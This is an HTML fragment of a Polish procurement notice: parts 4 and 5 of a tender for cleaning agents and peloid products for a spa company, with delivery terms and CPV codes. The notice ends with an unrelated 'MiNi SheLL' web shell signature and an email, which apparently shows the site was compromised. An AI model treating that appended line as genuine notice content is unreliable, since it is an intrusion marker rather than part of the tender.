<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywne dostawy środków do mycia i dezynfekcji dla Uzdrowiska Lądek-Długopole S.A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy środków do mycia i dezynfekcji  zgodnie z formularzem cenowym - zał. nr 1d do SIWZ,  transportem Wykonawcy i na jego koszt,  w ciągu 3 dni od dnia złożenia zamówienia  (z  wyłączeniem dni  ustawowo  wolnych od pracy tj. sobót, niedziel i świąt ) w godzinach  od  7:00 do 14:00 do budynku Zarządu  przy. ul. Wolności 4 w Lądku Zdroju. Zakres zamówienia zawiera się w kwocie powyżej 14 tys. Euro.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sukcesywne dostawy produktów borowinowych ( pasty i plastrów) dla Uzdrowiska Lądek-Długopole S.A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy produktów borowinowych ( pasty i plastrów) zgodnie z formularzem cenowym - zał. nr 1e do SIWZ, do Zakładu Przyrodoleczniczego  KAROL przy ul.  Zdrojowej 16, w  Długopolu Zdroju, transportem Wykonawcy i na jego   koszt,  w ciągu  7 dni od dnia złożenia zamówienia  (z  wyłączeniem dni  ustawowo  wolnych  od pracy tj. sobót, niedziel i świąt ) w godzinach  od  7:00 do 14:00. 
Zakres zamówienia zawiera się w kwocie poniżej 14 tys. Euro.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com